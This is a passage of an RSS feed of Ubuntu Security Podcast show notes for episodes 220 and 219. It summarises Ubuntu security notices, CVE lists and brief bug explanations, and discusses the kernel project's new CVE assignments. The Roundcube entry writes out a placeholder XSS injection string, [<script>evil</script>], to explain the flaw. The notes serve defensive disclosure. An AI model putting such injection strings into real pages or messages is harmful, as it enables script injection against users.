<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ktls + appletalk</li>
</ul>
<h3 id="usn-6653-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6653-1">USN-6653-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ktls + appletalk</li>
</ul>
<h3 id="usn-6652-1-linux-kernel--azure--vulnerabilities--03-47">[<a href="https://ubuntu.com/security/notices/USN-6652-1">USN-6652-1</a>] Linux kernel (Azure) vulnerabilities (03:47)</h3>
<ul>
<li>15 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0641">CVE-2024-0641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0582">CVE-2024-0582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6622">CVE-2023-6622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6531">CVE-2023-6531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5972">CVE-2023-5972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ktls + appletalk + NULL ptr deref in TLS impl (<a href="/episode-219/#lsn-0100-1-linux-kernel-vulnerability--00-56">[LSN-0100-1] Linux kernel vulnerability from Episode 219</a>)</li>
</ul>
<h3 id="usn-6649-1-firefox-vulnerabilities--04-14">[<a href="https://ubuntu.com/security/notices/USN-6649-1">USN-6649-1</a>] Firefox vulnerabilities (04:14)</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1556">CVE-2024-1556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1552">CVE-2024-1552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1551">CVE-2024-1551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1546">CVE-2024-1546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1557">CVE-2024-1557</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1555">CVE-2024-1555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1554">CVE-2024-1554</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1553">CVE-2024-1553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1550">CVE-2024-1550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1549">CVE-2024-1549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1548">CVE-2024-1548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1547">CVE-2024-1547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>123.0</li>
</ul>
<h3 id="usn-6654-1-roundcube-webmail-vulnerability--04-35">[<a href="https://ubuntu.com/security/notices/USN-6654-1">USN-6654-1</a>] Roundcube Webmail vulnerability (04:35)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-43770">CVE-2023-43770</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XSS able to abused by simple text/plain emails with crafted links - included
the ability to detect link references like <code>[1]</code> and linkify them to the
source - if an attacker used a form like <code>[&lt;script&gt;evil&lt;/script&gt;]</code> this would be
included in the generated HTML without escaping and so could get arbitrary XSS</li>
<li>Since is in universe, this update is available via Ubuntu Pro</li>
</ul>
<h3 id="usn-6655-1-gnu-binutils-vulnerabilities--05-54">[<a href="https://ubuntu.com/security/notices/USN-6655-1">USN-6655-1</a>] GNU binutils vulnerabilities (05:54)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48065">CVE-2022-48065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48063">CVE-2022-48063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47695">CVE-2022-47695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 instances of DoS via excessive memory consumption, one of NULL ptr deref -
in general upstream does not consider binutils safe for analysing untrusted
inputs</li>
</ul>
<h3 id="usn-6656-1-postgresql-vulnerability--06-31">[<a href="https://ubuntu.com/security/notices/USN-6656-1">USN-6656-1</a>] PostgreSQL vulnerability (06:31)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0985">CVE-2024-0985</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly drop privileges when handling <code>REFRESH MATERIALIZED VIEW CONCURRENTLY</code> commands - should drop privileges so that the SQL is executed as
the owner of the materialized view - as such, if an attacker could get a user
or automated system to run such a command they could possibly execute
arbitrary SQL as the user rather than as the owner of the view as expected</li>
</ul>
<h3 id="usn-6657-1-dnsmasq-vulnerabilities--07-10">[<a href="https://ubuntu.com/security/notices/USN-6657-1">USN-6657-1</a>] Dnsmasq vulnerabilities (07:10)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28450">CVE-2023-28450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50868">CVE-2023-50868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50387">CVE-2023-50387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>KeyTrap and NSEC3 proof related vuln in DNSSEC - <a href="/episode-219/#usn-6633-1-bind-vulnerabilities--07-33">[USN-6633-1] Bind
vulnerabilities from Episode 219</a></li>
</ul>
<h3 id="usn-6658-1-libxml2-vulnerability--07-33">[<a href="https://ubuntu.com/security/notices/USN-6658-1">USN-6658-1</a>] libxml2 vulnerability (07:33)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25062">CVE-2024-25062</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF if using DTD validation with XInclude expansion enabled</li>
</ul>
<h3 id="usn-6659-1-libde265-vulnerabilities--07-52">[<a href="https://ubuntu.com/security/notices/USN-6659-1">USN-6659-1</a>] libde265 vulnerabilities (07:52)</h3>
<ul>
<li>13 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24758">CVE-2023-24758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24757">CVE-2023-24757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24756">CVE-2023-24756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24755">CVE-2023-24755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24754">CVE-2023-24754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24752">CVE-2023-24752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24751">CVE-2023-24751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43245">CVE-2022-43245</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25221">CVE-2023-25221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47665">CVE-2022-47665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43250">CVE-2022-43250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43249">CVE-2022-43249</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43244">CVE-2022-43244</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Next lot of libde265 vulns after discussed previously in
<a href="/episode-219/#usn-6627-1-libde265-vulnerabilities--04-10">[USN-6627-1] libde265 vulnerabilities from
Episode 219</a> - more fuzzing related fixes for usual sorts of issues</li>
</ul>
<h3 id="usn-6660-1-usn-6661-1-openjdk-11-and-17-vulnerabilities--08-17">[<a href="https://ubuntu.com/security/notices/USN-6660-1">USN-6660-1</a>, <a href="https://ubuntu.com/security/notices/USN-6661-1">USN-6661-1</a>] OpenJDK 11 &amp; 17 vulnerabilities (08:17)</h3>
<ul>
<li>6 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-20952">CVE-2024-20952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20945">CVE-2024-20945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20926">CVE-2024-20926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20921">CVE-2024-20921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20919">CVE-2024-20919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20918">CVE-2024-20918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>11.0.22; 17.0.10</li>
</ul>
<h3 id="usn-6662-1-openjdk-21-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6662-1">USN-6662-1</a>] OpenJDK 21 vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-20952">CVE-2024-20952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20945">CVE-2024-20945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20921">CVE-2024-20921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20919">CVE-2024-20919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20918">CVE-2024-20918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>21.0.2</li>
</ul>
<h3 id="usn-6305-2-php-vulnerabilities--08-37">[<a href="https://ubuntu.com/security/notices/USN-6305-2">USN-6305-2</a>] PHP vulnerabilities (08:37)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3824">CVE-2023-3824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3823">CVE-2023-3823</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6663-1-openssl-update--08-40">[<a href="https://ubuntu.com/security/notices/USN-6663-1">USN-6663-1</a>] OpenSSL update (08:40)</h3>
<ul>
<li>Affecting Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)</li>
<li>Hardening update for openssl 3.0 / 1.0 - OpenSSL 3.2.0 introduced a change to
return random output instead of an exception when it detected wrong padding
for PKCS#1 v1.5 encryption - without this there is a timing side-channel which
can be used to infer the secret key and hence break confidentiality</li>
</ul>
<h3 id="usn-6664-1-less-vulnerability--09-40">[<a href="https://ubuntu.com/security/notices/USN-6664-1">USN-6664-1</a>] less vulnerability (09:40)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48624">CVE-2022-48624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to quote filenames when using <code>LESSCLOSE</code> - could then get arbitrary
shell commands - env var that tells less to invoke a particular command as an
input post-processor (this is used in conjunction with <code>LESSOPEN</code> to
pre-processor the file before it is displayed by less - for instance, if you
wanted to use less to page through a HTML file you might perhaps use this to
run it via <code>html2text</code> first - then use <code>LESSCLOSE</code> to do any cleanup)</li>
</ul>
<h3 id="usn-6644-2-libtiff-vulnerabilities--10-51">[<a href="https://ubuntu.com/security/notices/USN-6644-2">USN-6644-2</a>] LibTIFF vulnerabilities (10:51)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6277">CVE-2023-6277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6228">CVE-2023-6228</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52356">CVE-2023-52356</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in libtiff itself, plus a heap buffer overflow in the
tiffcp tool (used to combine multiple TIFF files into a single one) and
finally a possible OOM issue in libtiff if an input file specified a very
large size but then failed to actually contain such data (ie the headers
specify a certain size but the file itself doesn&rsquo;t contain that amount of
data)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="follow-up-to-linux-kernel-cna--11-40">Follow up to Linux kernel CNA (11:40)</h3>
<ul>
<li>Since announcing kernel.org has now started assigning CVEs</li>
<li>First CVE assigned
<ul>
<li><a href="https://lore.kernel.org/linux-cve-announce/2024022058-outsell-equator-e1c5@gregkh/T/#u">https://lore.kernel.org/linux-cve-announce/2024022058-outsell-equator-e1c5@gregkh/T/#u</a></li>
<li><code>CVE-2023-52433: netfilter: nft_set_rbtree: skip sync GC for new elements in this transaction</code></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52433">CVE-2023-52433</a></li>
<li>Assigned on 2024-02-20 12:53 UTC</li>
</ul>
</li>
<li>Both historical and recent
<ul>
<li>40 from 2024</li>
<li>66 from 2023</li>
<li>1 from 2022</li>
<li>165 from 2021</li>
<li>13 from 2020</li>
<li>3 from 2019</li>
</ul>
</li>
<li>As of <code>Fri 01 Mar 2024 04:04:26 UTC</code> have assigned 288 CVEs
<ul>
<li>9 days, 15 hours and 11 minutes or so</li>
<li>231 hours</li>
<li>Currently assigning more than 1 CVE per hour</li>
</ul>
</li>
<li>Looking at these, 8 appear to be due to reported issues from Coverity -
popular static analysis tool which is not infallible. Others appear to come
directly from the <a href="https://github.com/cloudsecurityalliance/gsd-database">GSD project</a> (Global Security Database)
<ul>
<li>e.g. <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25160">CVE-2019-25160</a>
(<a href="https://lore.kernel.org/linux-cve-announce/2024022657-CVE-2019-25160-e487@gregkh/T/#u">https://lore.kernel.org/linux-cve-announce/2024022657-CVE-2019-25160-e487@gregkh/T/#u</a>)
is the same as <a href="https://github.com/cloudsecurityalliance/gsd-database/blob/a75adc6d8e399af40b8208001f2d581d3601f7fc/2022/1001xxx/GSD-2022-1001715.json#L30">GSD-2022-1001715</a></li>
<li>As I mentioned in Episode 219, GSD has over 13573 Linux kernel issues</li>
<li>Whilst I also said that I hoped that the kernel CNA wouldn&rsquo;t be so much of a
firehose, currently it seems to be quite significant</li>
</ul>
</li>
<li>On a personal note - I have been doing the CVE Triage role on our team this
week - in past weeks, I would normally spend about 30-minutes to 1 hour each
day doing this - and this week it has been at least 2 hours each day, mostly
due to the large influx of kernel CVEs</li>
<li>Perhaps the only way to solve this is better tooling - on our side, mdeslaur
added support for automatically extracting the required git commits from the
CVE notifications and the kernel team already has tooling which checks if the
required commits are in the git trees of the various Ubuntu kernels</li>
<li>Hopefully that helps - but it doesn&rsquo;t help to assign priorities to each CVE</li>
<li>The kernel CNA is not assigning CVSS scores and they don&rsquo;t intend to -
although my understanding is this is required - and so we can&rsquo;t use this to help</li>
<li>So then we need to try and manually assess the impact of each CVE - but even
the kernel CNA says this is not obvious - so then perhaps the solution is to
just assign them all to medium and deal with them as part of the usual <a href="https://wiki.ubuntu.com/Kernel/kernel-sru-workflow">kernel
SRU cycle</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E220.mp3" length="18799323" type="audio/mpeg" /><itunes:duration>1127</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 219
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-219/</link>
          <pubDate>Fri, 16 Feb 2024 16:36:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>d5c5dcb200f8c169e1e88c3a0f27559eb1c43c8b0f520fd80b73573e4c3a9b1c708bab060a31a60990ac4a4b9dda81494aba8a86fc77190524c03745d8a55ddf</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 219</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week the Linux kernel project announced they will be assigning their own
  CVEs so we discuss the possible implications and fallout from such a shift, plus
  we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week the Linux kernel project announced they will be assigning their own
  CVEs so we discuss the possible implications and fallout from such a shift, plus
  we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.
  </itunes:summary>
        <description>  This week the Linux kernel project announced they will be assigning their own
  CVEs so we discuss the possible implications and fallout from such a shift, plus
  we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.
  </description>
        <googleplay:description>  This week the Linux kernel project announced they will be assigning their own
  CVEs so we discuss the possible implications and fallout from such a shift, plus
  we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week the Linux kernel project announced they will be assigning their own
CVEs so we discuss the possible implications and fallout from such a shift, plus
we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>64 unique CVEs addressed</p>
<h3 id="lsn-0100-1-linux-kernel-vulnerability--00-56">[<a href="https://ubuntu.com/security/notices/LSN-0100-1">LSN-0100-1</a>] Linux kernel vulnerability (00:56)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Focal (20.04 LTS), Bionic ESM (18.04 ESM), Xenial ESM (16.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in IGMP protocol (<a href="/episode-217/#usn-6601-1-linux-kernel-vulnerability--01-16">[USN-6601-1] Linux kernel vulnerability from Episode 217</a>)</li>
<li>UAF in netfilter (<a href="/episode-217/#usn-6606-1-linux-kernel--oem--vulnerabilities--03-04">[USN-6606-1] Linux kernel (OEM) vulnerabilities from Episode 217</a>)</li>
<li>UAF in SMB client implementation - local crash / privesc (<a href="/episode-217/#usn-6607-1-linux-kernel--azure--vulnerabilities--03-32">[USN-6607-1] Linux kernel (Azure) vulnerabilities from Episode 217</a>)</li>
<li>NULL ptr deref in kernel TLS offload implementation - allows a userspace
application to request that the kernel do TLS by providing it the key etc -
internally the kernel then takes the data to be sent from userspace and frames
it into a scatter list (describes the regions in memory containing the data to
be sent) - uses the kernel crypto API which is asynchronous
<ul>
<li>userspace can construct an invalid initial sequence number to trigger the
kernel to enter a code path where the network packet is freed before it has
finished being processed by the crypto API -&gt; UAF</li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-6.2</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-6.2</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-6.2</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>hwe-6.2</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>100.1</td>
          <td>100.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<p>To check your kernel type and Livepatch version, enter this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-6624-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6624-1">USN-6624-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0641">CVE-2024-0641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6622">CVE-2023-6622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6531">CVE-2023-6531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5972">CVE-2023-5972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35827">CVE-2023-35827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34324">CVE-2023-34324</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6625-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6625-1">USN-6625-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
